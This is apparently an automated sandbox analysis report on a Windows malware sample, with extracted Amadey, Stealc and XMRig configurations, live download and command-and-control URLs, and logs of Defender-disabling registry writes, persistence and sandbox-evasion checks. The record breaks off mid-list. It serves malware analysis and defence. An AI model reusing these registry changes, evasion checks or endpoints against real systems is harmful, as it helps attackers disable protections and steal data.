Analysis
-
max time kernel
133s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 18:41
Static task
static1
Behavioral task
behavioral1
Sample
6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
Resource
win10v2004-20250217-en
General
-
Target
6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe
-
Size
938KB
-
MD5
fa46bf7e563cae268f877b6868875b6f
-
SHA1
29d2e9285129ee07b476bf864e52dae99676bb42
-
SHA256
6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8
-
SHA512
5cce4d4e042efb139902c69154aa9d343629342bb1aa89e4ffdc140b81c683f6602ad7ad84db3038a36caf6332e43fa85b4f060e87f1da7b0944be089f20b935
-
SSDEEP
24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a4ru:ATvC/MTQYxsWR7a4r
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/1616-279-0x0000000000F50000-0x0000000001398000-memory.dmp healer behavioral1/memory/1616-280-0x0000000000F50000-0x0000000001398000-memory.dmp healer behavioral1/memory/1616-329-0x0000000000F50000-0x0000000001398000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" f3c2a01352.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" f3c2a01352.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" f3c2a01352.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" f3c2a01352.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection f3c2a01352.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" f3c2a01352.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" f3c2a01352.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" f3c2a01352.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications f3c2a01352.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" f3c2a01352.exe -
Stealc family
-
Xmrig family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4cee97f6df.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f62db21d11.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f3c2a01352.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
XMRig Miner payload 9 IoCs
resource yara_rule behavioral1/memory/1544-429-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1544-432-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1544-431-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1544-430-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1544-428-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1544-426-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1544-425-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1544-489-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1544-490-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 3036 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3036 powershell.exe 3708 powershell.exe 4076 powershell.exe -
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 3 IoCs
pid Process 3608 bitsadmin.exe 3488 bitsadmin.exe 3520 bitsadmin.exe -
Downloads MZ/PE file 10 IoCs
flow pid Process 7 2460 rapes.exe 12 2460 rapes.exe 12 2460 rapes.exe 12 2460 rapes.exe 12 2460 rapes.exe 12 2460 rapes.exe 12 2460 rapes.exe 140 2460 rapes.exe 140 2460 rapes.exe 4 3036 powershell.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4cee97f6df.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f62db21d11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f3c2a01352.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4cee97f6df.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f62db21d11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f3c2a01352.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe -
Executes dropped EXE 19 IoCs
pid Process 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 2460 rapes.exe 1944 4cee97f6df.exe 2088 f62db21d11.exe 2308 65fb82b9fe.exe 1616 f3c2a01352.exe 2756 v6Oqdnc.exe 3356 OEHBOHk.exe 3452 MCxU5Fj.exe 3500 MCxU5Fj.exe 476 Process not Found 4052 ckonftponqgz.exe 2888 Y87Oyyz.exe 1616 Y87Oyyz.exe 320 SplashWin.exe 1808 SplashWin.exe 3344 zY9sqWs.exe 3560 Ps7WqSx.exe 2376 FvbuInU.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 4cee97f6df.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine f62db21d11.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine f3c2a01352.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine FvbuInU.exe -
Loads dropped DLL 51 IoCs
pid Process 3036 powershell.exe 3036 powershell.exe 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 2460 rapes.exe 2460 rapes.exe 2632 WerFault.exe 2632 WerFault.exe 2632 WerFault.exe 2460 rapes.exe 2460 rapes.exe 2460 rapes.exe 2460 rapes.exe 2460 rapes.exe 2460 rapes.exe 2460 rapes.exe 3192 WerFault.exe 3192 WerFault.exe 3192 WerFault.exe 2460 rapes.exe 2460 rapes.exe 2460 rapes.exe 3452 MCxU5Fj.exe 3564 WerFault.exe 3564 WerFault.exe 3564 WerFault.exe 3564 WerFault.exe 3564 WerFault.exe 476 Process not Found 2460 rapes.exe 2888 Y87Oyyz.exe 1616 Y87Oyyz.exe 1616 Y87Oyyz.exe 320 SplashWin.exe 320 SplashWin.exe 320 SplashWin.exe 320 SplashWin.exe 1808 SplashWin.exe 1808 SplashWin.exe 1808 SplashWin.exe 2816 cmd.exe 2460 rapes.exe 2460 rapes.exe 2988 Syncsign_v1.exe 3472 WerFault.exe 3472 WerFault.exe 3472 WerFault.exe 2460 rapes.exe 2460 rapes.exe 2460 rapes.exe 2460 rapes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features f3c2a01352.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" f3c2a01352.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\4cee97f6df.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105590101\\4cee97f6df.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\f62db21d11.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105600101\\f62db21d11.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\65fb82b9fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105610101\\65fb82b9fe.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\f3c2a01352.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105620101\\f3c2a01352.exe" rapes.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3152 powercfg.exe 3840 powercfg.exe 3848 powercfg.exe 3832 powercfg.exe 3816 powercfg.exe 2988 powercfg.exe 3136 powercfg.exe 3160 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000018704-96.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 2460 rapes.exe 1944 4cee97f6df.exe 2088 f62db21d11.exe 1616 f3c2a01352.exe 2756 v6Oqdnc.exe 2376 FvbuInU.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3452 set thread context of 3500 3452 MCxU5Fj.exe 69 PID 4052 set thread context of 3168 4052 ckonftponqgz.exe 100 PID 4052 set thread context of 1544 4052 ckonftponqgz.exe 106 PID 1808 set thread context of 2816 1808 SplashWin.exe 112 -
resource yara_rule behavioral1/memory/1544-421-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-422-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-429-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-432-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-431-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-430-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-428-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-426-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-425-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-420-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-424-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-423-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-489-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1544-490-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3864 sc.exe 3952 sc.exe 4012 sc.exe 4020 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 2632 1944 WerFault.exe 39 3192 2756 WerFault.exe 65 3564 3452 WerFault.exe 68 3472 3344 WerFault.exe 121 -
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f62db21d11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 65fb82b9fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3c2a01352.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4cee97f6df.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 65fb82b9fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 65fb82b9fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 2848 taskkill.exe 2780 taskkill.exe 2992 taskkill.exe 2128 taskkill.exe 1404 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f8ef2768fe8ddb01 powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2524 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 2460 rapes.exe 1944 4cee97f6df.exe 2088 f62db21d11.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 1616 f3c2a01352.exe 1616 f3c2a01352.exe 1616 f3c2a01352.exe 2756 v6Oqdnc.exe 3356 OEHBOHk.exe 3708 powershell.exe 3356 OEHBOHk.exe 3356 OEHBOHk.exe 3356 OEHBOHk.exe 3356 OEHBOHk.exe 3356 OEHBOHk.exe 3356 OEHBOHk.exe 3356 OEHBOHk.exe 3356 OEHBOHk.exe 3356 OEHBOHk.exe 4052 ckonftponqgz.exe 4076 powershell.exe 4052 ckonftponqgz.exe 4052 ckonftponqgz.exe 4052 ckonftponqgz.exe 4052 ckonftponqgz.exe 4052 ckonftponqgz.exe 4052 ckonftponqgz.exe 4052 ckonftponqgz.exe 320 SplashWin.exe 1808 SplashWin.exe 1808 SplashWin.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 2816 cmd.exe 2816 cmd.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe 1544 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1808 SplashWin.exe 2816 cmd.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 3036 powershell.exe Token: SeDebugPrivilege 2992 taskkill.exe Token: SeDebugPrivilege 2128 taskkill.exe Token: SeDebugPrivilege 1404 taskkill.exe Token: SeDebugPrivilege 2848 taskkill.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 3000 firefox.exe Token: SeDebugPrivilege 3000 firefox.exe Token: SeDebugPrivilege 1616 f3c2a01352.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeShutdownPrivilege 3840 powercfg.exe Token: SeShutdownPrivilege 3848 powercfg.exe Token: SeShutdownPrivilege 3816 powercfg.exe Token: SeShutdownPrivilege 3832 powercfg.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeShutdownPrivilege 3152 powercfg.exe Token: SeShutdownPrivilege 3160 powercfg.exe Token: SeShutdownPrivilege 3136 powercfg.exe Token: SeShutdownPrivilege 2988 powercfg.exe Token: SeLockMemoryPrivilege 1544 explorer.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
pid Process 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 3000 firefox.exe 3000 firefox.exe 3000 firefox.exe 3000 firefox.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 3000 firefox.exe 3000 firefox.exe 3000 firefox.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe 2308 65fb82b9fe.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2272 wrote to memory of 2316 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 30 PID 2272 wrote to memory of 2316 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 30 PID 2272 wrote to memory of 2316 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 30 PID 2272 wrote to memory of 2316 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 30 PID 2272 wrote to memory of 2332 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 31 PID 2272 wrote to memory of 2332 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 31 PID 2272 wrote to memory of 2332 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 31 PID 2272 wrote to memory of 2332 2272 6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe 31 PID 2316 wrote to memory of 2524 2316 cmd.exe 33 PID 2316 wrote to memory of 2524 2316 cmd.exe 33 PID 2316 wrote to memory of 2524 2316 cmd.exe 33 PID 2316 wrote to memory of 2524 2316 cmd.exe 33 PID 2332 wrote to memory of 3036 2332 mshta.exe 34 PID 2332 wrote to memory of 3036 2332 mshta.exe 34 PID 2332 wrote to memory of 3036 2332 mshta.exe 34 PID 2332 wrote to memory of 3036 2332 mshta.exe 34 PID 3036 wrote to memory of 2928 3036 powershell.exe 36 PID 3036 wrote to memory of 2928 3036 powershell.exe 36 PID 3036 wrote to memory of 2928 3036 powershell.exe 36 PID 3036 wrote to memory of 2928 3036 powershell.exe 36 PID 2928 wrote to memory of 2460 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 37 PID 2928 wrote to memory of 2460 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 37 PID 2928 wrote to memory of 2460 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 37 PID 2928 wrote to memory of 2460 2928 TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE 37 PID 2460 wrote to memory of 1944 2460 rapes.exe 39 PID 2460 wrote to memory of 1944 2460 rapes.exe 39 PID 2460 wrote to memory of 1944 2460 rapes.exe 39 PID 2460 wrote to memory of 1944 2460 rapes.exe 39 PID 1944 wrote to memory of 2632 1944 4cee97f6df.exe 41 PID 1944 wrote to memory of 2632 1944 4cee97f6df.exe 41 PID 1944 wrote to memory of 2632 1944 4cee97f6df.exe 41 PID 1944 wrote to memory of 2632 1944 4cee97f6df.exe 41 PID 2460 wrote to memory of 2088 2460 rapes.exe 42 PID 2460 wrote to memory of 2088 2460 rapes.exe 42 PID 2460 wrote to memory of 2088 2460 rapes.exe 42 PID 2460 wrote to memory of 2088 2460 rapes.exe 42 PID 2460 wrote to memory of 2308 2460 rapes.exe 44 PID 2460 wrote to memory of 2308 2460 rapes.exe 44 PID 2460 wrote to memory of 2308 2460 rapes.exe 44 PID 2460 wrote to memory of 2308 2460 rapes.exe 44 PID 2308 wrote to memory of 2992 2308 65fb82b9fe.exe 45 PID 2308 wrote to memory of 2992 2308 65fb82b9fe.exe 45 PID 2308 wrote to memory of 2992 2308 65fb82b9fe.exe 45 PID 2308 wrote to memory of 2992 2308 65fb82b9fe.exe 45 PID 2308 wrote to memory of 2128 2308 65fb82b9fe.exe 47 PID 2308 wrote to memory of 2128 2308 65fb82b9fe.exe 47 PID 2308 wrote to memory of 2128 2308 65fb82b9fe.exe 47 PID 2308 wrote to memory of 2128 2308 65fb82b9fe.exe 47 PID 2308 wrote to memory of 1404 2308 65fb82b9fe.exe 49 PID 2308 wrote to memory of 1404 2308 65fb82b9fe.exe 49 PID 2308 wrote to memory of 1404 2308 65fb82b9fe.exe 49 PID 2308 wrote to memory of 1404 2308 65fb82b9fe.exe 49 PID 2308 wrote to memory of 2848 2308 65fb82b9fe.exe 51 PID 2308 wrote to memory of 2848 2308 65fb82b9fe.exe 51 PID 2308 wrote to memory of 2848 2308 65fb82b9fe.exe 51 PID 2308 wrote to memory of 2848 2308 65fb82b9fe.exe 51 PID 2308 wrote to memory of 2780 2308 65fb82b9fe.exe 53 PID 2308 wrote to memory of 2780 2308 65fb82b9fe.exe 53 PID 2308 wrote to memory of 2780 2308 65fb82b9fe.exe 53 PID 2308 wrote to memory of 2780 2308 65fb82b9fe.exe 53 PID 2308 wrote to memory of 2664 2308 65fb82b9fe.exe 55 PID 2308 wrote to memory of 